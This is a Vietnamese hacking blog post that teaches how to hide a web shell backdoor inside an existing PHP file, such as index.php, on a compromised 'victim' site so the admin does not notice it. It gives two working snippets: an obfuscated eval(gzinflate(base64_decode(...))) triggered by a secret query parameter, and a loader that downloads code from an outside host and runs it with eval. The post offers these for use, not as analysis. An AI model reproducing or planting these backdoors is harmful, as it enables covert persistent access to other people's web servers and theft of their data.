VN tin mới trang chuyên tin học , Kiếm tiền online, Tin tức công nghê, Phầm mềm tiện ích,thủ thuật máy tính,hướng dẫn kiếm tiền , Trò chơi

Powered by Blogger.

12/10/12

[BACK DOOR]Hướng dẫn ẩn Shell vào 1 file bất kỳ

0 comments
Chào mọi người. Lại 1 tít nữa đc lập ra với mục đích thảo luận để nâng cao tay nghề của mình.
Ở tít này thì mình muốn đề cập đến phương pháp ẩn shell trong web của victim.?
Giả thiết đặt ra. Chúng ta có 1 shell trên abc.com
Mục tiêu của mình sẽ là chèn con shell vào 1 file php khác trên web.
Ví dụ index.php
Khi mọi người và thằng admin truy cập abc.com/index.php. Thì mọi việc diễn ra bt.
Nhưng khi mình truy cập. abc.com/index.php?do=shellname thì sẽ mở ra cho mình vào shell ngay trên file index.php .
Demo


Ví dụ trên đc test trên vbb.
Nếu ai có cách riêng bí quyết hay để ẩn shell thì có thể chia sẻ để mọi người cùng thảo luận và chặt chém xD
Thảo luận nào a e
===============================
Cách làm của Black.
Mở 1 file bất kỳ. Chèn vào đó nội dung như sau
if (isset($_GET['y']))
{
eval(gzinflate(base64_decode('Code shell')))
exit;
}
Run shell xxx.php?y
Có thể thay y bằng các ký tự khác :D
Lưu ý. Code shell phải đc mã hóa gzinflate
Cũng như trên như ng nội dung khác như sau:
if($_REQUEST['do'] == ”Hades”){
$data = @file_get_contents(“http://darkit.info/offline.txt“);
$data = str_replace(“<?php”, ”", $data);
$data = str_replace(“?>”, ”", $data);
eval($data);
die();
trong đó dòng http://darkit.info/offline.txt là địa chỉ file shell được đặt trong file offline.txt(để ở dạng txt là good nhất:D)
Nguồn: darkit.info

No comments:

Post a Comment